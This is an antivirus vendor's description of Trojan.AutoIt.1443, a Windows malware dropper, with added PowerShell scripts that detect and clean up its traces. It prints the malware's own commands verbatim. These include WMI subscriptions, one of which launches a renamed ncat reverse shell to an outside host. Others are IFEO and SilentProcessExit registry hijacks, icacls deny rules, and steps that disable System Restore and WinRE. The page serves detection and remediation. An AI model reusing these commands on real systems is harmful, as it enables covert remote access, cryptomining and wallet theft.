Trojan.AutoIt.1443

Added to the Dr.Web virus database: 2024-08-27

Virus description added:

SHA1:

  • 09cffca796dce03c74950e10a349079d9afe3964
  • 419ef7dc18d178247daf68f0571a3dccb662792f
  • 9c17f83aba6b60c8d461a923050fc9a19e386ec1
  • e7ac807a446640a95a961fb5d873c051ee8c2793

Description

A malicious AutoIt script for Windows that drops a number of files onto the compromised PC in order to mine cryptocurrency covertly and to substitute data in the clipboard.

Operating routine

The script is launched by a dropper, which is a self-extracting archive. Once launched, Trojan.AutoIt.1443 will perform the following actions:

1. Check the list of running processes for the following names:


dUcAvastUI.exe
avgui.exe
avp.exe
avpui.exe
UninstallTool.exe
UninstallToolHelper.exe
SandboxieRpcSs.exe
SandboxieDcomLaunch.exe
httpdebuggerui.exe
wireshark.exe
fiddler.exe
vboxservice.exe
df5serv.exe
vboxtray.exe
vmtoolsd.exe
vmwaretray.exe
ida64.exe
ollydbg.exe
pIIfaXUcjllboZRestudio.exe
vmwareuser.exe
vgauthservice.exe
vmacthlp.exe
vmsrvc.exe
x32dbg.exe
x64dbg.exe
x96dbg.exe
vmusrvc.exe
prl_cc.exe
prl_tools.exe
qemu-ga.exe
joeboxcontrol.exe
ksdumperclient.exe
xenservice.exe
joeboxserver.exe
devenv.exe
immunitydebugger.exe
importrec.exe
windbg.exe
32dbg.exe
64dbg.exex
protection_id.exex
scylla_x86.exe
scylla_x64.exe
scylla.exe
idau64.exe
idau.exe
idaq64.exe
idaq.exe
idaw.exe
idag64.exe
idag.exe
ida.exe

If any of these processes is found, the script terminates. The list covers antivirus products, sandboxes, virtual machine guest tools, network sniffers and debuggers, so this is an anti-analysis check rather than a functional requirement.

2. Create directories

C:\ProgramData\NUL..
C:\ProgramData\AUX..
C:\ProgramData\Classic.{BB64F8A7-BEE7-4E1A-AB8D-7D8273F7FDB6}
C:\ProgramData\Classic.{20D04FE0-3AEA-1069-A2D8-08002B30309D}

NUL and AUX are reserved DOS device names. Ordinary Win32 path handling strips the trailing dots and maps the name to the device, so the first two directories cannot be entered or deleted with normal tools; they are only reachable through the \\?\ extended-length path prefix, which makes them awkward to remove by hand.

Set the SYSTEM, HIDDEN and READONLY attributes on the two Classic.{...} directories: C:\ProgramData\Classic.{BB64F8A7-BEE7-4E1A-AB8D-7D8273F7FDB6} and C:\ProgramData\Classic.{20D04FE0-3AEA-1069-A2D8-08002B30309D}.

3. Unpack files

C:\ProgramData\NUL..\libssl-1_1.dll
C:\ProgramData\NUL..\vcruntime140.dll
C:\ProgramData\NUL..\libcrypto-1_1.dll
C:\ProgramData\NUL..\StartMenuExperienceHost.exe

These files are not malicious in themselves. libssl-1_1.dll and libcrypto-1_1.dll are the OpenSSL 1.1 libraries and vcruntime140.dll is the Visual C++ runtime; they are the dependencies that StartMenuExperienceHost.exe, a renamed ncat.exe, needs in order to open a TLS connection to the attacker's C2 server. The renamed ncat is detected as Tool.Ncat.1.

C:\ProgramData\AUX..\ShellExt.dll
C:\ProgramData\AUX..\DeviceId.dll

The ShellExt.dll file, which is unpacked into the AUX.. directory and into both Classic.{...} directories, is a renamed AutoIt interpreter; the .dll extension is only a disguise, and the file is executed directly. Here it runs a malicious script embedded in the overlay of DeviceId.dll, a file that still carries a valid digital signature. The script unpacks and launches the SilentCryptoMiner miner (detected as Trojan.BtcMine.3767), which is injected into the explorer.exe process using the Process Hollowing technique.

C:\ProgramData\Classic.{BB64F8A7-BEE7-4E1A-AB8D-7D8273F7FDB6}\nun.bat
C:\ProgramData\Classic.{BB64F8A7-BEE7-4E1A-AB8D-7D8273F7FDB6}\ShellExt.dll
C:\ProgramData\Classic.{BB64F8A7-BEE7-4E1A-AB8D-7D8273F7FDB6}\DeviceId.dll

Similarly, in this directory the AutoIt interpreter (ShellExt.dll), launched by nun.bat, runs a malicious script embedded in the overlay of DeviceId.dll to mine cryptocurrency.

C:\ProgramData\Classic.{20D04FE0-3AEA-1069-A2D8-08002B30309D}\xun.bat
C:\ProgramData\Classic.{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellExt.dll
C:\ProgramData\Classic.{20D04FE0-3AEA-1069-A2D8-08002B30309D}\7zxa.dll

This set of files runs a clipper embedded in the 7zxa.dll library, which is likewise injected into explorer.exe using the Process Hollowing technique. The clipper watches the clipboard and replaces cryptocurrency wallet addresses copied by the user with the attacker's addresses.

C:\ProgramData\inst.bat

This script performs the same functions as described below in item 4.1.

4. Create events and modify the registry

4.1 Create WMI permanent event subscriptions (an __EventFilter, a CommandLineEventConsumer and a __FilterToConsumerBinding in root\subscription) that periodically relaunch the payloads. The __InstanceModificationEvent query on Win32_PerfFormattedData_PerfOS_System fires on every polling interval given by WITHIN, so each subscription acts as a timer: "nut" runs StartMenuExperienceHost.exe (ncat.exe) every 180 seconds to open a TLS reverse shell (-e cmd.exe) to gamesjumpers[.]com on port 5353, "nur" relaunches the clipper (xun.bat) every 300 seconds, "per" relaunches the miner (nun.bat) every 600 seconds, and "pers" relaunches the AUX.. copy of the miner every 900 seconds.


wmic /NAMESPACE:"\\root\subscription" PATH __EventFilter CREATE Name="nut", EventNameSpace="root\cimv2",QueryLanguage="WQL", Query="SELECT * FROM __InstanceModificationEvent WITHIN 180 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'"
wmic /NAMESPACE:"\\root\subscription" PATH CommandLineEventConsumer CREATE Name="nut", CommandLineTemplate="C:\ProgramData\NUL..\StartMenuExperienceHost.exe --ssl gamesjumpers[.]com 5353 -e cmd.exe"
wmic /NAMESPACE:"\\root\subscription" PATH __FilterToConsumerBinding CREATE Filter="__EventFilter.Name="nut"", Consumer="CommandLineEventConsumer.Name="nut""
wmic /NAMESPACE:"\\root\subscription" PATH __EventFilter CREATE Name="nur", EventNameSpace="root\cimv2",QueryLanguage="WQL", Query="SELECT * FROM __InstanceModificationEvent WITHIN 300 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'"
wmic /NAMESPACE:"\\root\subscription" PATH CommandLineEventConsumer CREATE Name="nur", ExecutablePath="C:\ProgramData\Classic.{20D04FE0-3AEA-1069-A2D8-08002B30309D}\xun[.]bat", CommandLineTemplate="C:\ProgramData\Classic.{20D04FE0-3AEA-1069-A2D8-08002B30309D}\xun[.]bat"
wmic /NAMESPACE:"\\root\subscription" PATH __FilterToConsumerBinding CREATE Filter="__EventFilter.Name="nur"", Consumer="CommandLineEventConsumer.Name="nur""
wmic /NAMESPACE:"\\root\subscription" PATH __EventFilter CREATE Name="per", EventNameSpace="root\cimv2",QueryLanguage="WQL", Query="SELECT * FROM __InstanceModificationEvent WITHIN 600 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'"
wmic /NAMESPACE:"\\root\subscription" PATH CommandLineEventConsumer CREATE Name="per", ExecutablePath="C:\ProgramData\Classic.{BB64F8A7-BEE7-4E1A-AB8D-7D8273F7FDB6}\nun[.]bat", CommandLineTemplate="C:\ProgramData\Classic.{BB64F8A7-BEE7-4E1A-AB8D-7D8273F7FDB6}\nun[.]bat"
wmic /NAMESPACE:"\\root\subscription" PATH __FilterToConsumerBinding CREATE Filter="__EventFilter.Name="per"", Consumer="CommandLineEventConsumer.Name="per""
wmic /NAMESPACE:"\\root\subscription" PATH __EventFilter CREATE Name="pers", EventNameSpace="root\cimv2",QueryLanguage="WQL", Query="SELECT * FROM __InstanceModificationEvent WITHIN 900 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'"
wmic /NAMESPACE:"\\root\subscription" PATH CommandLineEventConsumer CREATE Name="pers", CommandLineTemplate="C:\ProgramData\AUX..\ShellExt.dll C:\ProgramData\AUX..\DeviceId[.]dll"
wmic /NAMESPACE:"\\root\subscription" PATH __FilterToConsumerBinding CREATE Filter="__EventFilter.Name="pers"", Consumer="CommandLineEventConsumer.Name="pers""

4.2 Add registry keys that run the malicious files through the Image File Execution Options (IFEO) technique. A Debugger value makes Windows start the named program (with the original command line appended) instead of the target image whenever that image is launched, so starting MoUsoCoreWorker.exe, GoogleUpdate.exe or MicrosoftEdgeUpdate.exe runs xun.bat or nun.bat. GlobalFlag 512 (0x200, FLG_MONITOR_SILENT_PROCESS_EXIT) together with the SilentProcessExit subkey (ReportingMode=1, MonitorProcess) makes Windows launch the .bat file every time an svchost.exe or TrustedInstaller.exe process exits.


reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MoUsoCoreWorker.exe" /v Debugger /t REG_SZ /d "C:\ProgramData\Classic.{20D04FE0-3AEA-1069-A2D8-08002B30309D}\xun[.]bat" /f
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\GoogleUpdate.exe" /v Debugger /t REG_SZ /d "C:\ProgramData\Classic.{20D04FE0-3AEA-1069-A2D8-08002B30309D}\xun[.]bat" /f
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MicrosoftEdgeUpdate.exe" /v Debugger /t REG_SZ /d "C:\ProgramData\Classic.{BB64F8A7-BEE7-4E1A-AB8D-7D8273F7FDB6}\nun[.]bat" /f
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\svchost.exe" /v GlobalFlag /t REG_DWORD /d 512 /f
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\svchost.exe" /v ReportingMode /t REG_DWORD /d 1 /f
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\svchost.exe" /v MonitorProcess /t REG_SZ /d "C:\ProgramData\Classic.{BB64F8A7-BEE7-4E1A-AB8D-7D8273F7FDB6}\nun[.]bat" /f
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\TrustedInstaller.exe" /v GlobalFlag /t REG_DWORD /d 512 /f
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\TrustedInstaller.exe" /v ReportingMode /t REG_DWORD /d 1 /f
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\TrustedInstaller.exe" /v MonitorProcess /t REG_SZ /d "C:\ProgramData\Classic.{20D04FE0-3AEA-1069-A2D8-08002B30309D}\xun[.]bat" /f
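As an added example (not code from the Dr.Web description), the following PowerShell triage script enumerates both persistence mechanisms from items 4.1 and 4.2 on a suspect host and flags the patterns seen in this sample: a consumer command line under C:\ProgramData or an ncat-style "-e cmd.exe" template, any IFEO Debugger value, and any image with GlobalFlag bit 0x200 or a SilentProcessExit monitor. The only assumption is that dropped payloads live under C:\ProgramData, as they do here; $SuspectDir is the author's variable, not the sample's.

```powershell
# Added example (not part of the Dr.Web description): triage of the persistence
# mechanisms from items 4.1 and 4.2. Run in an elevated PowerShell session.
# Assumption: dropped payloads live under C:\ProgramData, as in this sample.
$SuspectDir = 'C:\ProgramData'

# --- 4.1: permanent WMI event subscriptions are stored in root\subscription ---
$ns        = 'root/subscription'
$filters   = Get-CimInstance -Namespace $ns -ClassName __EventFilter
$consumers = Get-CimInstance -Namespace $ns -ClassName CommandLineEventConsumer
$bindings  = Get-CimInstance -Namespace $ns -ClassName __FilterToConsumerBinding

$wmiFindings = foreach ($b in $bindings) {
    # Filter and Consumer are object references; resolve them back to instances by Name
    $f = $filters   | Where-Object { $_.Name -eq $b.Filter.Name }
    $c = $consumers | Where-Object { $_.Name -eq $b.Consumer.Name }
    if (-not $c) { continue }   # bindings to other consumer types are not covered here
    $cmd = ('{0} {1}' -f $c.ExecutablePath, $c.CommandLineTemplate).Trim()
    [pscustomobject]@{
        Name    = $c.Name
        Query   = $f.Query
        Command = $cmd
        # a payload under ProgramData, or an ncat-style "-e cmd.exe" reverse shell
        Suspect = ($cmd -like "$SuspectDir*") -or ($cmd -match '\s-e\s+cmd\.exe')
    }
}
$wmiFindings | Format-Table -AutoSize

# --- 4.2: IFEO Debugger values and SilentProcessExit monitors ---
$ifeo = 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options'
$spe  = 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit'

$regFindings = @(foreach ($key in Get-ChildItem -LiteralPath $ifeo) {
    $v = Get-ItemProperty -LiteralPath $key.PSPath
    if ($v.Debugger) {
        [pscustomobject]@{ Image = $key.PSChildName; Kind = 'IFEO Debugger'; Value = $v.Debugger }
    }
    # GlobalFlag bit 0x200 (FLG_MONITOR_SILENT_PROCESS_EXIT) arms the SilentProcessExit key
    if (($v.GlobalFlag -band 0x200) -ne 0) {
        [pscustomobject]@{ Image = $key.PSChildName; Kind = 'GlobalFlag 0x200'; Value = ('0x{0:X}' -f $v.GlobalFlag) }
    }
})
if (Test-Path -LiteralPath $spe) {
    $regFindings += @(foreach ($key in Get-ChildItem -LiteralPath $spe) {
        $v = Get-ItemProperty -LiteralPath $key.PSPath
        [pscustomobject]@{ Image = $key.PSChildName; Kind = 'SilentProcessExit'; Value = $v.MonitorProcess }
    })
}
$regFindings | Format-Table -AutoSize
```

On a host infected with this sample the WMI table shows the four consumers nut, nur, per and pers with Suspect set to True, and the registry table lists the three Debugger entries plus the svchost.exe and TrustedInstaller.exe monitors. The creation of these subscriptions is also recorded retrospectively in the Microsoft-Windows-WMI-Activity/Operational log (event 5861) and, where Sysmon is deployed, as events 19, 20 and 21, which is useful when the subscriptions have already been cleaned up.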

5. Configuration

5.1 Change directory permissions by running the following commands

icacls "C:\ProgramData\Classic.{BB64F8A7-BEE7-4E1A-AB8D-7D8273F7FDB6}" /deny *S-1-1-0:(DE,WDAC,WO,AS,AD,WEA,DC,WA,WD) /T /C
icacls "C:\ProgramData\Classic.{20D04FE0-3AEA-1069-A2D8-08002B30309D}" /deny *S-1-1-0:(DE,WDAC,WO,AS,AD,WEA,DC,WA,WD) /T /C

This adds a deny entry for Everyone (SID S-1-1-0) on both directories and, because of /T, on everything inside them, revoking the following rights:

  • Delete (DE)
  • Change the discretionary access control list (WDAC)
  • Take ownership, i.e. write owner (WO)
  • Access the system security descriptor, the SACL (AS)
  • Create subfolders and append data (AD)
  • Write extended attributes (WEA)
  • Delete subfolders and files (DC)
  • Write attributes (WA)
  • Create files and write data (WD)

Since Everyone includes administrators, the files cannot simply be deleted even from an elevated session: the deny entries have to be removed first, for example by taking ownership with the SeTakeOwnershipPrivilege and resetting the ACL.

5.2 Disable System Restore by setting the following registry values:

HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore - DisableSR=1
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore - DisableConfig=1

Then the Windows Recovery Environment is disabled with the following command:

reagentc /disable

Both steps make it harder to roll the system back to a clean state.

5.3 Run the C:\ProgramData\inst.bat file
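The curing recommendations below rely on the vendor's scanner; the following PowerShell script is an added manual cleanup procedure written for this page, not code from Dr.Web, covering the artifacts from items 2, 4 and 5. It removes the four WMI subscriptions first so that nothing relaunches the payloads mid-cleanup, undoes the IFEO and SilentProcessExit entries, lifts the System Restore policy and re-enables WinRE, stops processes running from the dropped directories, and finally deletes the directories: the Classic.{...} folders by taking ownership and resetting the ACL before clearing the attributes, and the NUL.. and AUX.. folders through the \\?\ extended-length path prefix, which rd understands. All names and paths are the ones quoted on the page; the script assumes an elevated session and that a reboot follows, because code hollowed into explorer.exe is not touched here.

```powershell
# Added example (not part of the Dr.Web description): manual cleanup of the
# artifacts from items 2, 4 and 5. Run elevated; reboot afterwards so that the
# miner and clipper hollowed into explorer.exe are gone as well.
$dirs = @(
    'C:\ProgramData\NUL..',
    'C:\ProgramData\AUX..',
    'C:\ProgramData\Classic.{BB64F8A7-BEE7-4E1A-AB8D-7D8273F7FDB6}',
    'C:\ProgramData\Classic.{20D04FE0-3AEA-1069-A2D8-08002B30309D}'
)
$ns   = 'root/subscription'
$ifeo = 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options'
$spe  = 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit'
$sr   = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore'

# 1. Remove the WMI subscriptions (item 4.1): binding, then consumer, then filter.
foreach ($n in 'nut', 'nur', 'per', 'pers') {
    Get-CimInstance -Namespace $ns -ClassName __FilterToConsumerBinding |
        Where-Object { $_.Filter.Name -eq $n } | Remove-CimInstance
    Get-CimInstance -Namespace $ns -ClassName CommandLineEventConsumer -Filter "Name='$n'" | Remove-CimInstance
    Get-CimInstance -Namespace $ns -ClassName __EventFilter -Filter "Name='$n'" | Remove-CimInstance
}

# 2. Remove the IFEO Debugger hijacks and the SilentProcessExit monitors (item 4.2).
foreach ($img in 'MoUsoCoreWorker.exe', 'GoogleUpdate.exe', 'MicrosoftEdgeUpdate.exe') {
    Remove-ItemProperty -LiteralPath "$ifeo\$img" -Name Debugger -ErrorAction SilentlyContinue
}
foreach ($img in 'svchost.exe', 'TrustedInstaller.exe') {
    Remove-ItemProperty -LiteralPath "$ifeo\$img" -Name GlobalFlag -ErrorAction SilentlyContinue
    Remove-Item -LiteralPath "$spe\$img" -Recurse -Force -ErrorAction SilentlyContinue
}

# 3. Lift the System Restore policy and re-enable the recovery environment (item 5.2).
Remove-ItemProperty -LiteralPath $sr -Name DisableSR, DisableConfig -ErrorAction SilentlyContinue
reagentc /enable | Out-Null

# 4. Stop every process whose image lives in one of the dropped directories
#    (the renamed ncat and the renamed AutoIt interpreter, ShellExt.dll).
Get-CimInstance -ClassName Win32_Process | Where-Object {
    $exe = $_.ExecutablePath
    $exe -and ($dirs | Where-Object { $exe.StartsWith($_, 'OrdinalIgnoreCase') })
} | ForEach-Object { Stop-Process -Id $_.ProcessId -Force -ErrorAction SilentlyContinue }

# 5. Delete the directories and the installer script.
foreach ($d in $dirs) {
    if ($d -match '\\(NUL|AUX)\.\.$') {
        # reserved device name: only reachable through the \\?\ prefix, which rd accepts
        cmd /c rd /s /q "\\?\$d"
        continue
    }
    if (-not (Test-Path -LiteralPath $d)) { continue }
    takeown /f $d /r /d y | Out-Null    # SeTakeOwnershipPrivilege bypasses the deny ACEs (item 5.1)
    icacls $d /reset /T /C | Out-Null   # replace the ACLs with the inherited defaults
    attrib -s -h -r $d /s /d            # clear SYSTEM, HIDDEN and READONLY on the whole tree
    Remove-Item -LiteralPath $d -Recurse -Force
}
Remove-Item -LiteralPath 'C:\ProgramData\inst.bat' -Force -ErrorAction SilentlyContinue
```

The order matters: deleting the files while the subscriptions are still bound would let the next polling interval recreate running copies, and deleting the Classic.{...} directories without the takeown/icacls step fails with "Access is denied" even for administrators because the deny entry applies to Everyone.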

6. Obtain information about the compromised computer

Send a GET request to ip-api[.]com/json to obtain geolocation information. The GPU model and the installed antivirus software are collected through WMI (the winmgmt service), the CPU model is read from the HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 registry subkey, and the operating system version and architecture are taken from the AutoIt macros @OSVersion and @OSArch.

The collected information is sent to a Telegram bot.

Mitre Matrix

Execution (TA0002)
  • Windows Management Instrumentation (T1047)
  • Command and Scripting Interpreter (T1059)
  • Scripting (T0853)
  • Shared Modules (T1129)

Persistence (TA0003)
  • Event Triggered Execution (T1546)
  • Image File Execution Options Injection (T1546.012)
  • Boot or Logon Autostart Execution (T1547)
  • Registry Run Keys / Startup Folder (T1547.001)
  • Hijack Execution Flow (T1574)
  • DLL Side-Loading (T1574.002)
  • Services File Permissions Weakness (T1574.010)

Privilege Escalation (TA0004)
  • Process Injection (T1055)
  • Process Hollowing (T1055.012)
  • Event Triggered Execution (T1546)
  • Image File Execution Options Injection (T1546.012)
  • Registry Run Keys / Startup Folder (T1547.001)

Defense Evasion (TA0005)
  • Obfuscated Files or Information (T1027)
  • Masquerading (T1036)
  • Process Injection (T1055)
  • Process Hollowing (T1055.012)
  • Indicator Removal (T1070)
  • File Deletion (T1070.004)
  • Modify Registry (T1112)
  • File and Directory Permissions Modification (T1222)
  • Hide Artifacts (T1564)
  • Hidden Files and Directories (T1564.001)
  • Virtualization/Sandbox Evasion (T1497)

Discovery (TA0007)
  • System Information Discovery (T1082)
  • Software Discovery (T1518)
  • System Location Discovery (T1614)

Collection (TA0009)
  • Clipboard Data (T1115)
  • Screen Capture (T1113)

Command and Control (TA0011)
  • Encrypted Channel (T1573)

Impact (TA0040)
  • System Shutdown/Reboot (T1529)

Curing recommendations

  1. If the operating system (OS) can be loaded (either normally or in safe mode), download Dr.Web Security Space and run a full scan of your computer and of the removable media you use.
  2. If you cannot boot the OS, change the BIOS settings to boot your system from a CD or USB drive. Download the image of the emergency system repair disk Dr.Web LiveDisk, write it to a USB drive or burn it to a CD/DVD. After booting from this media, run a full scan and cure all the detected threats.